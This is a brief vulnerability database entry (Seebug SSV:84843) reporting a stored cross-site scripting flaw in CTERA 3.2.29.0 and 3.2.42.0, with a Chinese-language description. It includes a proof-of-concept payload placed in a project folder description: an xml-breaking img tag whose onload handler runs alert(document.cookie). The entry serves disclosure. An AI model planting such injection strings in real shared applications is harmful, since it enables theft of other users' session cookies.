CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS

2014-07-01T00:00:00
ID SSV:84843
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                恶意用户可以修改项目文件夹描述进行XSS攻击和HTML注入(添加链接、图片和按钮等)。 因为项目文件夹时被不同用户共享,该漏洞可以用来抓取会话cookie。

创建一个项目文件夹并添加下面的描述(根据版本修改特定路径):
</xml><img src="https://192.168.3.2/admingui/common.3.2.29.291012114828/script/ext/resources/images/default/grid/loading.gif" onload="alert(document.cookie);">
<xml>